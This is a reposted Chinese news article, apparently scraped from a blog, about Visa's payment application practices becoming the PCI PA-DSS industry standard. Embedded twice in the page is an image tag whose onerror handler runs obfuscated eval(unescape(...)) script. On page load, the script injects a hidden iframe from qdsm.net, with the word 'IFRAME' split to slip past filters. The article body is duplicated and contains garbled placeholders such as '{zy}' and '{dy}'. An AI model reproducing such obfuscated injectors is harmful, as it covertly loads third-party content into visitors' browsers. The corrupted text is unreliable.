VISA信用卡安全方案将成银行支付业标准
[转贴 2010-04-07 19:10:45]
VISA信用卡安全方案将成银行支付业标准
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_250_250.html%20width%3D250%20height%3D250%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
上周PCI安全标准委员会(PCI Security Standards Council)宣布支付行业中使用的第三方应用程序软件将以VISA开发的一套新的标准为基准,这一方案的推出立即引起各方关注……
【IT专家网{dj2}】上周管理银行支付卡行业数据安全机构,PCI安全标准委员会(PCI Security Standards Council)宣布支付行业中使用的第三方应用程序软件将以VISA开发的一套新的标准为基准。这套新的标准叫做支付程序数据安全标准(Payment Application Data Security Standard,PA-DSS),它所依据的是VISA支付程序{zy}方法( Payment Application Best Practices,PABA)。
在接下来的几个月之内,来自于各行业的专家,包括PCI安全标准委员会,以及相关的参与组织,安全检查专家,漏洞扫描厂商,将会对支付程序数据安全标准(PA-DSS)相关的问题提出建议和改进措施。
PCI安全标准委员会的总经理Bob Russo说,2008年{dy}季度将会公布最终的应用程序安全标准,据悉,这一标准将会融合各个方面的意见。
实施这一新的支付安全标准的目的是为了迎合日益增长的第三方支付程序安全问题,目前有大量的零售商和公司使用信用卡支付业务。但目前很多支付程序都已经过时并且缺乏相应的PCI数据安全标准规定的相关监控措施。
譬如说,尽管PCI安全标准委员会的指导方针中明令禁止使用默认程序,但老一代的支付程序软件在获取和储存持卡人的相应信息时仍然以默认程序来执行。同时,老一代支付程序也没有PCI所规定的相应的交易记录能力。
VISA一直是信用卡联盟中推动PCI最积极的公司,并且一直在依靠相应的软件开发商来接受它的支付程序{zy}化标准PABA。尽管VISA没有明确要求软件开发商接受这一{zy}化标准,但是它却一直通过各种方式施压,例如,通过授权商家只使用与PABP相适应的第三方支付软件。
就在两个星期之前,VISA就正式的宣布了要求其它公司只能使用与PABP相适应的第三方支付应用程序。
随着这一行动昨天的宣布,PCI标准委员会已经采纳了VISA的相关标准加以改造使之成为一个全行业的标准——这意味着不仅仅是VISA在向第三方支付软件开发商施压接受新的安全控制措施。同时,包括MasterCard 公司,Discover 金融公司,全美快递服务公司以及JCB国际信用卡服务公司也在对外界施压。信用卡支付行业标准正在发生悄然变化。
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_336_280.html%20width%3D336%20height%3D280%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
上周PCI安全标准委员会(PCI Security Standards Council)宣布支付行业中使用的第三方应用程序软件将以VISA开发的一套新的标准为基准,这一方案的推出立即引起各方关注……
【IT专家网{dj2}】上周管理银行支付卡行业数据安全机构,PCI安全标准委员会(PCI Security Standards Council)宣布支付行业中使用的第三方应用程序软件将以VISA开发的一套新的标准为基准。这套新的标准叫做支付程序数据安全标准(Payment Application Data Security Standard,PA-DSS),它所依据的是VISA支付程序{zy}方法( Payment Application Best Practices,PABA)。
在接下来的几个月之内,来自于各行业的专家,包括PCI安全标准委员会,以及相关的参与组织,安全检查专家,漏洞扫描厂商,将会对支付程序数据安全标准(PA-DSS)相关的问题提出建议和改进措施。
PCI安全标准委员会的总经理Bob Russo说,2008年{dy}季度将会公布最终的应用程序安全标准,据悉,这一标准将会融合各个方面的意见。
实施这一新的支付安全标准的目的是为了迎合日益增长的第三方支付程序安全问题,目前有大量的零售商和公司使用信用卡支付业务。但目前很多支付程序都已经过时并且缺乏相应的PCI数据安全标准规定的相关监控措施。
譬如说,尽管PCI安全标准委员会的指导方针中明令禁止使用默认程序,但老一代的支付程序软件在获取和储存持卡人的相应信息时仍然以默认程序来执行。同时,老一代支付程序也没有PCI所规定的相应的交易记录能力。
VISA一直是信用卡联盟中推动PCI最积极的公司,并且一直在依靠相应的软件开发商来接受它的支付程序{zy}化标准PABA。尽管VISA没有明确要求软件开发商接受这一{zy}化标准,但是它却一直通过各种方式施压,例如,通过授权商家只使用与PABP相适应的第三方支付软件。
就在两个星期之前,VISA就正式的宣布了要求其它公司只能使用与PABP相适应的第三方支付应用程序。
随着这一行动昨天的宣布,PCI标准委员会已经采纳了VISA的相关标准加以改造使之成为一个全行业的标准——这意味着不仅仅是VISA在向第三方支付软件开发商施压接受新的安全控制措施。同时,包括MasterCard 公司,Discover 金融公司,全美快递服务公司以及JCB国际信用卡服务公司也在对外界施压。信用卡支付行业标准正在发生悄然变化。
郑重声明:资讯 【VISA信用卡安全方案将成银行支付业标准- 投资银行- amenable - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
